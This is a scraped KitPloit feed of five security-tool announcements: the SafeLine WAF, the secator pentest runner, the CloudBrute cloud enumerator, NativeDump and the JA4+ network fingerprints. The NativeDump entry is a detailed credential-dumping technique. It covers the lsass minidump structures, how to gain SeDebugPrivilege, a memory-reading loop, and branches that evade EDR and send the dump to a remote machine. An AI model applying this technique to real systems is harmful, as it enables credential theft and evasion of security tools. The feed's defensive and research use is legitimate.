KitPloit - PenTest Tools!

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

By: Zion3R β€” September 24th 2024 at 11:30


SafeLine is a self-hosted WAF (Web Application Firewall) that protects your web apps from attacks and exploits.

A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL injection, XSS, code injection, OS command injection, CRLF injection, LDAP injection, XPath injection, RCE, XXE, SSRF, path traversal, backdoors, brute force, HTTP floods, and bot abuse, among others.


How It Works


By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse-proxy, protecting the server from exposure by having clients pass through the WAF before reaching the server.

A WAF protects your web apps by filtering, monitoring, and blocking malicious HTTP/S traffic traveling to the web application, and prevents unauthorized data from leaving the app. It does this by adhering to a set of policies that help determine what traffic is malicious and what traffic is safe. Just as a proxy server acts as an intermediary to protect the identity of a client, a WAF operates in a similar fashion, acting as a reverse-proxy intermediary that protects the web app server from a potentially malicious client.
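To make the reverse-proxy idea concrete, here is a minimal Python sketch (not SafeLine's implementation; the upstream address and the rules are illustrative assumptions): requests are checked against simple rules and only forwarded to the protected app if they look safe.

import re
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

UPSTREAM = "http://127.0.0.1:8000"  # hypothetical protected web app

# Toy detection rules; a real WAF like SafeLine uses far more sophisticated analysis.
RULES = [
    re.compile(r"union\s+select|or\s+1=1", re.I),  # naive SQL injection check
    re.compile(r"<script\b", re.I),                # naive XSS check
    re.compile(r"\.\./"),                          # naive path traversal check
]

class WafHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Block the request before it ever reaches the upstream server.
        if any(rule.search(self.path) for rule in RULES):
            self.send_error(403, "Blocked by WAF rule")
            return
        # Otherwise act as a reverse proxy: forward the request, relay the response.
        with urllib.request.urlopen(UPSTREAM + self.path) as resp:
            body = resp.read()
        self.send_response(resp.status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), WafHandler).serve_forever()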

Its core capabilities include:

  • Defenses for web attacks
  • Proactive bot abused defense
  • HTML & JS code encryption
  • IP-based rate limiting
  • Web Access Control List


Get Live Demo

FEATURES

The main features are as follows:

  β€’ Block Web Attacks: Defends against common web attacks such as SQL injection, XSS, code injection, OS command injection, CRLF injection, XXE, SSRF, and path traversal.
  β€’ Rate Limiting: Defends your web apps against DoS attacks, brute-force attempts, traffic surges, and other types of abuse by throttling traffic that exceeds defined limits.
  β€’ Anti-Bot Challenge: Protects your website from bot attacks; human users are allowed through, while crawlers and bots are blocked.
  β€’ Authentication Challenge: When the authentication challenge is turned on, visitors must enter a password; otherwise they are blocked.
  β€’ Dynamic Protection: When dynamic protection is turned on, the HTML and JS code served by your web server is dynamically encrypted on each visit.


KitPloit - PenTest Tools!

Secator - The Pentester's Swiss Knife

By: Zion3R β€” September 22nd 2024 at 11:30


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Complexity from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

| Name | Description | Category |
|---|---|---|
| httpx | Fast HTTP prober. | http |
| cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
| gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
| gospider | Fast web spider written in Go. | http/crawler |
| katana | Next-generation crawling and spidering framework. | http/crawler |
| dirsearch | Web path discovery. | http/fuzzer |
| feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
| ffuf | Fast web fuzzer written in Go. | http/fuzzer |
| h8mail | Email OSINT and breach hunting tool. | osint |
| dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
| dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
| subfinder | Fast subdomain finder. | recon/dns |
| fping | Find alive hosts on local networks. | recon/ip |
| mapcidr | Expand CIDR ranges into IPs. | recon/ip |
| naabu | Fast port discovery tool. | recon/port |
| maigret | Hunt for user accounts across many websites. | recon/user |
| gf | A wrapper around grep to avoid typing common patterns. | tagger |
| grype | A vulnerability scanner for container images and filesystems. | vuln/code |
| dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
| msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
| wpscan | WordPress Security Scanner. | vuln/multi |
| nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
| nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
| searchsploit | Exploit searcher. | exploit/search |

Feel free to request new tools by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator comes with a minimal set of dependencies by default.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves
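As a rough illustration of what such a lookup involves, the Python snippet below queries the CIRCL CVE Search API for a single CVE. The endpoint path follows the classic public API and is an assumption, not secator's actual code.

import json
import urllib.request

def lookup_cve(cve_id):
    # Classic CIRCL CVE Search route; treat the exact path as an assumption.
    url = f"https://cve.circl.lu/api/cve/{cve_id}"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return json.load(resp)

info = lookup_cve("CVE-2021-44228")
print(info.get("summary", "no summary available"))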

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

And more... To list all the tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out:

  β€’ Our complete documentation
  β€’ Our getting started tutorial video
  β€’ Our Medium post
  β€’ Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



KitPloit - PenTest Tools!

CloudBrute - Awesome Cloud Enumerator

By: Zion3R β€” June 25th 2024 at 12:30


A tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available here.


Motivation

We are always thinking of something we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers.
Here is the list of issues with previous approaches that we tried to fix:

  • separated wordlists
  • lack of proper concurrency
  • lack of supporting all major cloud providers
  • require authentication or keys or cloud CLI access
  • outdated endpoints and regions
  • Incorrect file storage detection
  • lack support for proxies (useful for bypassing region restrictions)
  • lack support for user agent randomization (useful for bypassing rare restrictions)
  • hard to use, poorly configured

Features

  • Cloud detection (IPINFO API and Source Code)
  • Supports all major providers
  • Black-Box (unauthenticated)
  • Fast (concurrent)
  • Modular and easily customizable
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Supported Cloud Providers

Microsoft: Storage, Apps

Amazon: Storage, Apps

Google: Storage, Apps

DigitalOcean: Storage

Vultr: Storage

Linode: Storage

Alibaba: Storage

Version

1.0.0

Usage

Just download the latest release for your operating system and follow the usage instructions.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder containing a config.yaml file.

It looks like this

providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.
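To illustrate how the environments drive URL generation, here is a hedged Python sketch of the mutation idea (CloudBrute itself is written in Go; the exact patterns are assumptions based on the examples above):

environments = ["test", "dev", "prod", "stage", "staging", "bak"]
keyword = "target"                 # the -k argument
wordlist = ["backup", "files"]     # entries from the -w wordlist

def mutations(keyword, words, envs):
    # Combine wordlist entries and environments into candidate names,
    # e.g. test-target and test.target, as in the examples above.
    for word in [keyword] + words:
        for env in envs:
            yield f"{env}-{word}"
            yield f"{env}.{word}"
            yield f"{word}-{env}"

for name in mutations(keyword, wordlist, environments):
    print(name)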

We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

After setting up your API key, you are ready to use CloudBrute.

 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

-h --help Print help information
-d --domain domain
-k --keyword keyword used to generate URLs
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config


for example

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.

If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w ./data/storage_small.txt -c amazon -o target_output.txt

Dev

  • Clone the repo
  • go build -o CloudBrute main.go
  • go test internal

In action

How to contribute

  • Add a module or fix something and then pull request.
  • Share it with whomever you believe can use it.
  • Do the extra work and share your findings with community β™₯

FAQ

How to make the best out of this tool?

Read the usage.

I get errors; what should I do?

Make sure you read the usage correctly, and if you think you found a bug open an issue.

When I use proxies, I get too many errors, or it's too slow?

That's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify which proxies work well with your chosen provider.

Too fast or too slow?

Change the -T (timeout) option to get the best results for your run.

Credits

Inspired by every single repo listed here.



KitPloit - PenTest Tools!

NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Zion3R β€” June 16th 2024 at 17:16


NativeDump allows you to dump the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams).


  • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
  • NtOpenProcess to get a handle for the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp".

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

Some benefits of this technique are:

  β€’ It does not use the well-known dbghelp!MinidumpWriteDump function
  β€’ It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
  β€’ The Minidump file does not have to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


Technique in detail: Creating a minimal Minidump file

After reading up on the undocumented Minidump structures, the file format can be summed up as:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes from the process from each memory region which can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


A. Header

The header is a 32-bytes structure which can be defined in C# as:

public struct MinidumpHeader
{
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
}

The required values are:

  β€’ Signature: Fixed value 0x504D444D (the "MDMP" string)
  β€’ Version: Fixed value 0xA793 (Microsoft constant MINIDUMP_VERSION)
  β€’ NumberOfStreams: Fixed value 3, the three streams required for the file
  β€’ StreamDirectoryRva: Fixed value 0x20 (32 bytes), the size of the header
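As a quick sanity check of the 32-byte layout, this Python snippet packs the header described above with struct.pack; the two padding runs are an assumption about how the C# struct is aligned to reach 32 bytes (the tool itself is C#).

import struct

header = struct.pack(
    "<IHHHxxII4xQ",  # little-endian; xx/4x are assumed alignment padding
    0x504D444D,      # Signature: "MDMP"
    0xA793,          # Version: MINIDUMP_VERSION
    0,               # ImplementationVersion
    3,               # NumberOfStreams: SystemInfo, ModuleList, Memory64List
    0x20,            # StreamDirectoryRva: directory starts right after header
    0,               # CheckSum
    0,               # TimeDateStamp
)
assert len(header) == 32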


B. Stream Directory

Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the total size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
    public uint StreamType;
    public uint Size;
    public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 HandleOperationListStream

C. SystemInformation Stream

The first stream is a SystemInformation stream, with ID 7. Its size is 56 bytes and it is located at offset 68 (0x44), right after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
}

The required values are:

  β€’ ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
  β€’ MajorVersion, MinorVersion and BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


D. ModuleList Stream

The second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInformation stream, and it also has a fixed size of 112 bytes, since it holds the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

The typical structure for this stream is a 4-byte value containing the number of entries, followed by a 108-byte entry for each module:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
}

As there is only one, it gets simplified to:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
}

The required values are:

  β€’ NumberOfModules: Fixed value 1
  β€’ BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
  β€’ Size: Obtained by adding up all memory region sizes from BaseAddress until reaching a region with a size of 4096 bytes (0x1000), the .text section of another library
  β€’ PointerName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located right after the stream itself at offset 236 (0xEC)


E. Memory64List Stream

The third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

public struct Memory64ListStream
{
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
}

Each memory region entry is a 16-byte structure:

public struct Memory64Info
{
    public IntPtr Address;
    public IntPtr Size;
}

The required values are:

  β€’ NumberOfEntries: Number of memory regions, obtained after looping through them
  β€’ MemoryRegionsBaseAddress: Location of the start of the memory region bytes, calculated by adding up the size of all the 16-byte memory entries
  β€’ Address and Size: Obtained for each valid region while looping through them


F. Looping memory regions

There are prerequisites for looping through the memory regions of the lsass.exe process, which can be met using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivileges, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant across all the latest Windows versions)
  2. Obtain the process ID. For example, loop through all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!NtOpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this, it is possible to traverse process memory by calling:

  β€’ ntdll!NtQueryVirtualMemory: Returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
  β€’ If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populate one entry of the Memory64List stream and the bytes can be added to the file
  β€’ If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
  β€’ ntdll!NtReadVirtualMemory: Adds the bytes of that region to the Minidump file after the Memory64List stream
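The loop can be sketched in Python/ctypes as follows; for brevity this uses the documented kernel32!VirtualQueryEx and OpenProcess instead of the NTAPIs the tool calls, and the PID is a placeholder.

import ctypes
from ctypes import wintypes

MEM_COMMIT = 0x1000
PAGE_NOACCESS = 0x01
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("BaseAddress", ctypes.c_void_p),
        ("AllocationBase", ctypes.c_void_p),
        ("AllocationProtect", wintypes.DWORD),
        ("PartitionId", wintypes.WORD),
        ("RegionSize", ctypes.c_size_t),
        ("State", wintypes.DWORD),
        ("Protect", wintypes.DWORD),
        ("Type", wintypes.DWORD),
    ]

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

def readable_regions(pid):
    # Committed, accessible regions are the ones that populate Memory64List.
    handle = kernel32.OpenProcess(
        PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    mbi = MEMORY_BASIC_INFORMATION()
    address = 0
    while kernel32.VirtualQueryEx(handle, ctypes.c_void_p(address),
                                  ctypes.byref(mbi), ctypes.sizeof(mbi)):
        if mbi.State == MEM_COMMIT and mbi.Protect != PAGE_NOACCESS:
            yield mbi.BaseAddress, mbi.RegionSize
        address = (mbi.BaseAddress or 0) + mbi.RegionSize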


G. Creating Minidump file

After the previous steps, we have everything necessary to create the Minidump file. We can create the file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes beforehand. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




KitPloit - PenTest Tools!

JA4+ - Suite Of Network Fingerprinting Standards

By: Zion3R β€” May 25th 2024 at 12:30


JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)


To understand how to read JA4+ fingerprints, see Technical Details

This repo includes JA4+ in Python, Rust, Zeek, and C (as a Wireshark plugin).

JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
Cloudflare
fastly
with more to be announced...

Examples

Application JA4+ Fingerprints
Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
JA4S=t120300_c030_5e2616a54c73
Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
JA4S=t130200_1301_a56c5b993250
JA4X=000000000000_4f24da86fad6_bf0f0589fc03
JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
JA4X=2166164053c1_2166164053c1_30d204a01551
SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
JA4S=t130200_1302_a56c5b993250
JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
Qakbot JA4X=2bab15409345_af684594efb4_000000000000
Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
Darkgate JA4H=po10nn060000_cdb958d032b0
LummaC2 JA4H=po11nn050000_d253db9d024b
Evilginx JA4=t13d191000_9dc949149365_e7c285222651
Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

Plugins

Wireshark
Zeek
Arkime

Binaries

We recommend tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

Download the latest JA4 binaries from: Releases.

JA4+ on Ubuntu

sudo apt install tshark
./ja4 [options] [pcap]

JA4+ on Mac

1) Install Wireshark from https://www.wireshark.org/download.html, which will install tshark
2) Add tshark to $PATH:

ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]

JA4+ on Windows

1) Install Wireshark for Windows from https://www.wireshark.org/download.html, which will install tshark.exe
tshark.exe is at the location where Wireshark is installed, for example: C:\Program Files\Wireshark\tshark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd and navigate to the ja4 folder

ja4 [options] [pcap]

Database

An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

In the meantime, see ja4plus-mapping.csv

Feel free to do a pull request with any JA4+ data you find.

JA4+ Details

